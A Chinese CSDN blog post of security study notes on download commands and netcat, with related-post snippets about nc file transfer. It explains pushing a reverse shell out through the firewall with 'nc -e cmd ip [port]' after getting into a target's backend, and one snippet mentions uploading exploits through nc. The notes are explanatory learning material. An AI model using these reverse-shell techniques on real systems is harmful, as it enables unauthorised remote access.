安全学习笔记(一)-文件下载以及NC

已于 2022-03-23 15:44:09 修改
阅读量5.8k 收藏
点赞数
分类专栏: 笔记 文章标签: 网络安全
于 2022-03-03 17:53:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681115/article/details/123259849
版权

ps:2022.3.3 尝试重新更学习笔记,算是简单总结下所学的,也为之后查阅提供便利。

先谈文件下载
首先,文件下载主要通过棱角来得到linux或者windows不同系统的下载命令

其次NC瑞士军刀
若进入对方后台,可以通过前面所谈到的“文件下载”命令,在提前准备好的文件服务器上下载文件,如nc
通过对方nc反弹shell到自己的cmd上(前提自己这边是公网,如果是内网得做端口映射),相对于自己而言,也称之为反向连接。(正向连接是自己主动发出)

为什么需要反向连接?
因为防火墙的机制——“出去容易,进来很难”
也就是对出去的流量限制宽松,而进来的很严格。所以这也是为什么要反向连接。

对于正向连接的话在关掉对方的防火墙前提下,也容易实现。
而且自己内网是可以直接连通出去外网的,就不像反向连接有限制。

自己实际用服务器来尝试了一下,最后成功了。(实验环境:自己的电脑(内网)以及一台白嫖的华为服务器(外网))
有个需要注意的地方:关掉服务器防火墙之后,也需要修改服务器上的安全组(即开放端口),否则也无法成功。

自己发出请求:nc -e cmd ip [port]
这里是在对方端口监听到的,已经获取自己这边的cmd了,成功。
在这里插入图片描述

Dwlufvex
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nc客户端安装
06-27
文档类总结此服务器只对使用NC方式接入的客户有效。企业端安全服务器被称为NetSafe Client。它有两个可以配置的端口分别用于加密和签名/验签服务,如下图所示(假设1为加密端口,2为签名/验签端口)
nc系统下载
03-11
nc1.5.0.07
Windows下载netcat(nc)命令
最新发布
qq_74182912的博客
05-31 502
或者打开两个cmd窗口进行测试,一个输入nc -l -p 9000,另一个窗口输入nc localhost 9000。也就是第二个窗口去连接了本地的9000端口,两个cmd窗口可以进行信息的输入与接收。在Path里新增相应的解压后文件夹的路径,记得将所打开的页面进行保存。设置--->系统----->高级系统设置----->环境变量。也就是第一个窗口监听了9000这个端口。localhost指本地的ip地址。-p 参数 指定相应的监听端口。将安装包下载后,进行解压。-l 参数 开启监听。
nc下载文件
fdrgbs1的专栏
11-16 1527
-- 原服务器文件 nc -l 1567 < from.txt -- 下周目的服务器 nc -n 127.0.0.11567 >from.txt
NC主键生成方式详情
weixin_44903950的博客
03-06 352
NC主键生成方式详情
使用python批量下载ftp服务器下的nc文件
weixin_44977185的博客
10-14 370
【代码】使用python批量下载ftp服务器下的nc文件。
nc从服务器上传下载文件
Fly_鹏程万里
03-18 3132
上传文件: nc -l port > 文件名称 下载文件: nc target_ip port > 文件名称 查看结果: PS:当我们获取目标主机的一个shell之后,可以在本地查找exp,之后编译,最后使用nc上传到目标服务器端去执行~ ...
Linux学习笔记(搬运).zip
01-05
Linux学习笔记是一个包含丰富内容的资源包,专为那些希望深入了解和掌握Linux操作系统的人们设计。Linux是一种开源、自由的类UNIX操作系统,被广泛应用于服务器、嵌入式设备以及个人计算机上。本笔记将带你踏上Linux...
linux笔记一.doc
12-16
这是一份由个人整理的Linux学习笔记,旨在系统性地梳理和回顾Linux操作系统中的常用命令和操作技巧。笔记以日期为章节,详细记录了学习过程,展示了作者王鹭鹭在不同阶段的学习内容和理解深度。 1. **基础命令**:...
2014用友实施顾问培训--产品安装(包含详细的ORACLE安装和NC63安装)
08-12
- 安装的第一步是配置安全更新选项,在这里可以选择是否接收安全更新。一般情况下,为了减少不必要的邮件通知,可以取消勾选“我希望通过MyOracleSupport接受安全更新”。 4. **安全选项**: - 在安全选项页面,...
寒冰linux零起点学习笔记
11-25
【寒冰Linux零起点学习笔记】是一份专为初学者设计的Linux系统学习资源,旨在帮助没有基础的用户从零开始掌握Linux操作系统的基本概念、使用技巧以及相关命令。通过【描述】我们可以了解到,这份笔记包含了观看"寒冰...
Windows下nc命令工具下载
10-26
netcat 1.11 for Win32/Win64, windows nc命令
C#读取.nc文件
04-11
请在VS2013版本以上打开,仅向上兼容,不可向下,内有备注,请查看。
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
nc文件转txt
11-30
nc文件转成txt文件。 首先要将netcdf.dll放进system32下,然后将其它文件拷贝到cmd默认目录下。在cmd中执行截图中的命令即可生成nc文件对应的文本文件。
nc文件basemap画图。另外一篇程序的数据
12-06
python3 使用basemap,nc文件。画降水图。与另一片文章的程序匹配。
linux服务器命令用法笔记
09-22
随着对Linux的深入学习,你会发现更多强大的工具和技巧,比如`tar`用于压缩和解压文件,`vi/vim`作为强大的文本编辑器,以及`ssh`进行远程登录和操作。不断实践和探索,你将成为一名优秀的Linux系统管理员。
nc实现多服务间上传下载文件
jeevi的博客
11-14 733
近段有本地和服务之间传递文件, 但公司服务器ssh跳板机登录, szrz, scp 都不可用, 看了网上教程可以用nc命令实现传递 甚至传递文件夹 1、安装 nc yum install nc -y 2、监听文件 // 在 10.60.102.35 这台主机监听 12345 端口(注意符号是 “<” ) nc -l 12345 < input.csv // 在 10.60.102.33 这台主机下载文件(注意符号是 “>” ) nc --recv-only 10.60.102.
nc (NetCat) 网络安全工具介绍
cavalier的学习之路
05-04 9290
搞系统安全的人,可能没人没听说过大名鼎鼎的nc吧,它可以代替telnet,可以启监听程序,可以用来传输文件,可以用来作为黑客辅助程序,深受大量hacker的喜爱,其功能有如瑞士军刀般好用。 NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动
Go语言学习笔记 - 雨痕
这是一份由雨痕编写的Go语言学习笔记,详细记录了作者在学习Go语言过程中的心得和知识点。笔记内容涵盖Go语言的基础到高级特性,适合已经观看过无闻大神视频并希望进一步巩固和深入理解Go语言的读者。 笔记内容包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值